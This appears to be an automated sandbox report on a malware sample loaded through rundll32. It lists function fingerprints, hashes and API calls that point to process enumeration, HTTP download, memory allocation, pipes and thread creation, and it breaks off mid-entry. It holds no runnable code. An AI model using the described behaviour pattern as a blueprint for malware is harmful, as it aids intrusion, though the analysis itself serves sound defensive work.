                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 541ab72dd635451082995b8613512323543e8198801155409134fa54fb96020a
                          • Instruction ID: 9035cefd315ab5247aefcf5ce15f0b85b1b25702da164d9777979ee66d2e97de
                          • Opcode Fuzzy Hash: 541ab72dd635451082995b8613512323543e8198801155409134fa54fb96020a
                          • Instruction Fuzzy Hash: 8841E8E090CE42CEFA605B74E48D3F962D3AF45B78F702635E5AE866D5DF2CE4058A01

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3243318325-0
                          • Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                          • Instruction ID: e754435095474fa9deef6be2f949832fc823fb004156639f812eefea394e9ad9
                          • Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                          • Instruction Fuzzy Hash: DE0121B2A18A41C6E7B0CF20E48C37AB3A2FBC4758F541231E58D82A68DF3CD506CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenRtlp
                          • String ID: 0$@
                          • API String ID: 2893929204-1545510068
                          • Opcode ID: 99056d26cda8ca3d4e3c89b7d0603f3ace301f699dcb2688138bdbb85deba410
                          • Instruction ID: 09ab14a63faf7baf01c864343de7858476c691b3e24157e58bab9dd63532bef5
                          • Opcode Fuzzy Hash: 99056d26cda8ca3d4e3c89b7d0603f3ace301f699dcb2688138bdbb85deba410
                          • Instruction Fuzzy Hash: 0F012CF2618A81CAD760DF20E4843ABB7A5F7843A4FA05135E68D82A69DF7CC555CF40

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: NameUserwsprintf
                          • String ID: frontdesk
                          • API String ID: 54179028-1081972030
                          • Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                          • Instruction ID: 37f7de13950a7fa4f50d5af8a21784b2b116961660802afea95d109b566e4bd1
                          • Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                          • Instruction Fuzzy Hash: E4F098F1A2898396EA50AF20E8893F96363FB80754FD01031E14D46595DF6CE65ADB40

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Volume$Find$CloseFirstInformation
                          • String ID:
                          • API String ID: 586543143-0
                          • Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                          • Instruction ID: c2db2af98e57c998f7995b0ed56f6e6bde8b8e52a2091ff361b565743f322bc8
                          • Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                          • Instruction Fuzzy Hash: 6E11DAB1518A41D6E7609B20F4883FAB3A2F785360FA40236E29D42AA8DF3CD559CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: MemoryVirtual$AllocateCrackFreeInternet
                          • String ID: h
                          • API String ID: 3448157997-2439710439
                          • Opcode ID: 0f96a828715db361c3cf63272a53f74c9ab47edebcf9e5cc9c7d4e07a2834f5c
                          • Instruction ID: d766aa1afbc62a98b4f9b1587b905830bad9ef2b370108f45a731a0a70e30055
                          • Opcode Fuzzy Hash: 0f96a828715db361c3cf63272a53f74c9ab47edebcf9e5cc9c7d4e07a2834f5c
                          • Instruction Fuzzy Hash: CD31B2B6619B84CAD760DF25E4947AAB3A1F7C8B54F504225EA8D83B99CF3CC504CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandle$CrackFreeHttpMemoryOpenRequestVirtual
                          • String ID:
                          • API String ID: 125755524-0
                          • Opcode ID: 05acc83d97d48f0ba9840e5df3ad9815127f8235e43ee1c8653a9ef429597d62
                          • Instruction ID: c062120a170576115efe1079133e8eb7c45531059fcf1cbbf7c9cc85732a7f28
                          • Opcode Fuzzy Hash: 05acc83d97d48f0ba9840e5df3ad9815127f8235e43ee1c8653a9ef429597d62
                          • Instruction Fuzzy Hash: 6651DAB251DE81C5E660DB24F4943BAB7E2FBC43A4F606035E68D82AA9DF7CD444CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$ConnectOpen
                          • String ID:
                          • API String ID: 2790792615-0
                          • Opcode ID: 0fe91170214488c1f31aaa1ce2ab234376f6321324653d804dedd54fde8ae1f3
                          • Instruction ID: aa3c3bc7aebfdd819f1ca6576caa4b34024dd3700e676ad90dcb2b8245c3394f
                          • Opcode Fuzzy Hash: 0fe91170214488c1f31aaa1ce2ab234376f6321324653d804dedd54fde8ae1f3
                          • Instruction Fuzzy Hash: AF11E8B291CF81C6E7608F28F49876BB6B1F7C5798F201125E7C946A68DF7DD0548B00
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8381a955bc61871f0359c33ee3e291de89bd3433656366222b7e30a7a9f8691b
                          • Instruction ID: ee9b451b5cf86ab863982d541c48258ebac645a06e4aefb677b71d98cbdadc8b
                          • Opcode Fuzzy Hash: 8381a955bc61871f0359c33ee3e291de89bd3433656366222b7e30a7a9f8691b
                          • Instruction Fuzzy Hash: 397133F150CE86C5E750DB24E4883FAA3A2FB843A4F601136E68D47AA9DF7CD545CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileInternetRead
                          • String ID:
                          • API String ID: 778332206-0
                          • Opcode ID: a68542daa31667be7df08955cda83d3b91bfe5c76f250ac66b7e363db0ead897
                          • Instruction ID: 62d05b9f7d27c187ada764dbc54dce264c713d8a7be7767b61ed5fd37d282cbf
                          • Opcode Fuzzy Hash: a68542daa31667be7df08955cda83d3b91bfe5c76f250ac66b7e363db0ead897
                          • Instruction Fuzzy Hash: 752142B66289818BD761CA25E4547FAA3D2F7C8784F505134EA8D83B98EF3DD545CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentFormatFreeMemoryPathUserVirtual
                          • String ID:
                          • API String ID: 2593304397-0
                          • Opcode ID: 9f1dc64e2660647f48657db305d7ecd1854051da390ce74a7bee0b97b00f7db3
                          • Instruction ID: 0a20585a4ca7038dd7025ea05551bb1f98d6c3a18ff42b38bc5afd3610090741
                          • Opcode Fuzzy Hash: 9f1dc64e2660647f48657db305d7ecd1854051da390ce74a7bee0b97b00f7db3
                          • Instruction Fuzzy Hash: 0B2135E2A2CD43D9EA609B30E4C93FA63E2FB84394F602535E6CE41599DF2CE5048701
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: MemoryVirtual$AllocateFileFreeModuleName
                          • String ID:
                          • API String ID: 1369786923-0
                          • Opcode ID: 07f92dfef09a587dddc401c1254499f12169b726f2b64713fbf301a2a07a4dad
                          • Instruction ID: 2aa20b1e27fb10e2aaa75916a251d0344e78bb0c57a94203603944eee7155d34
                          • Opcode Fuzzy Hash: 07f92dfef09a587dddc401c1254499f12169b726f2b64713fbf301a2a07a4dad
                          • Instruction Fuzzy Hash: 3B21B5F2528A81CBD670DB15E0893AAB7E1F788798F102125E68D42A98CF7CD544CF04
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf
                          • String ID:
                          • API String ID: 2111968516-0
                          • Opcode ID: 09100f0300395ae6f5b584f03befab42788e05347f36807b9dbcae9cb551cf0d
                          • Instruction ID: 5697c4cb9d1f96907e02973aae41dfaba72db0cd3571a537d27a9bce32842d8c
                          • Opcode Fuzzy Hash: 09100f0300395ae6f5b584f03befab42788e05347f36807b9dbcae9cb551cf0d
                          • Instruction Fuzzy Hash: 671121B262CA81DAD761DB20E4843BAB3E1FBC8754F605135E68D42AA8DF3CD645CF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HttpOpenRequest
                          • String ID:
                          • API String ID: 1984915467-0
                          • Opcode ID: d3bbcf092bf317b69aa5920fd26c720e35799b4d4559b083c20404fb49592572
                          • Instruction ID: 5cb7c3cc7c72a62d3d33cef884e7858d5350ad1271b9437168709dd0a7b4c804
                          • Opcode Fuzzy Hash: d3bbcf092bf317b69aa5920fd26c720e35799b4d4559b083c20404fb49592572
                          • Instruction Fuzzy Hash: 9D112EB250DB82C9E7A18B20E4983FA77E1F785364F741435D68D82A58DF3DD544CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectorySystem
                          • String ID:
                          • API String ID: 2188284642-0
                          • Opcode ID: dfb4a1fa39bbd87ebdbe77a0f586fcf263206d1ff544b9d7c1b54ce86c222524
                          • Instruction ID: ef1441ed88f3e41a9afe15f2a90bae5b91c0b3e622a51e163684984b28128d45
                          • Opcode Fuzzy Hash: dfb4a1fa39bbd87ebdbe77a0f586fcf263206d1ff544b9d7c1b54ce86c222524
                          • Instruction Fuzzy Hash: F8E0EDD2A18982D6EA60A630D4893FA62E2BB90314FE05231A19DC69E5DE2CDA16C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: c45bf1b7016e12f55803173f5a134f8e4d9140d986f13323f797921f0d003010
                          • Instruction ID: 3f20f6867bef3f504fbfaaffc3a638a42d43881d0efacf4051dfcfcd1e99fb3f
                          • Opcode Fuzzy Hash: c45bf1b7016e12f55803173f5a134f8e4d9140d986f13323f797921f0d003010
                          • Instruction Fuzzy Hash: 38E0EDF2928B41C5D3A49B20E4893AA67E2F784368F602439E58E42B68CF3CD155CA00
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateByteCharMemoryMultiVirtualWide
                          • String ID:
                          • API String ID: 2538853753-0
                          • Opcode ID: bdff32931c568aa2b41cae0d8167a9a3209d769e680741c51a3239078880a574
                          • Instruction ID: 7058de807307744b775d107d8aa79a5e7252e2ce70f4d2008cae2c872269d0f7
                          • Opcode Fuzzy Hash: bdff32931c568aa2b41cae0d8167a9a3209d769e680741c51a3239078880a574
                          • Instruction Fuzzy Hash: 5501C0B6628A85CAD790DB24E4857AEBBE1F788754F106035FA8B83B54DE3CD5458B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                          • String ID: h
                          • API String ID: 30365702-2439710439
                          • Opcode ID: c7ea92724c3334c97a9971424b4cca70876af855f6483493e30f8d1e3fdc11da
                          • Instruction ID: e16abf71577ed44fa8e8a7115dee1e9a57167d3849fb8ea48b35087b1b200b7a
                          • Opcode Fuzzy Hash: c7ea92724c3334c97a9971424b4cca70876af855f6483493e30f8d1e3fdc11da
                          • Instruction Fuzzy Hash: E7C1D1B6608BC18AE760CF65E4983AAB7A2F7C4754F505125EA8D83E68CF7CD449CF40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileInitOpenStringUnicode
                          • String ID: $0$@
                          • API String ID: 3719522541-2347541974
                          • Opcode ID: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
                          • Instruction ID: dd6b6564e4e0780194e7c887d88dc62cd5b759fa0c73ffbcc2fa829ece055e02
                          • Opcode Fuzzy Hash: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
                          • Instruction Fuzzy Hash: B10192B1518A41D6E750DF20E4983EBB7A1F7C4754FA01035E68E42A68DF7DD589CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AttributesCloseCreateInitStringUnicode
                          • String ID: 0$@
                          • API String ID: 2504508917-1545510068
                          • Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                          • Instruction ID: 4e770b361f841b3e0bf8f54851e483a0c5d4ee32cda18a154c3ca4410fa4046f
                          • Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                          • Instruction Fuzzy Hash: A321C8B2518B81CAE7609F20E4983EBB7A1F7C0358F604135E68946AA9DF7DD949CF40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
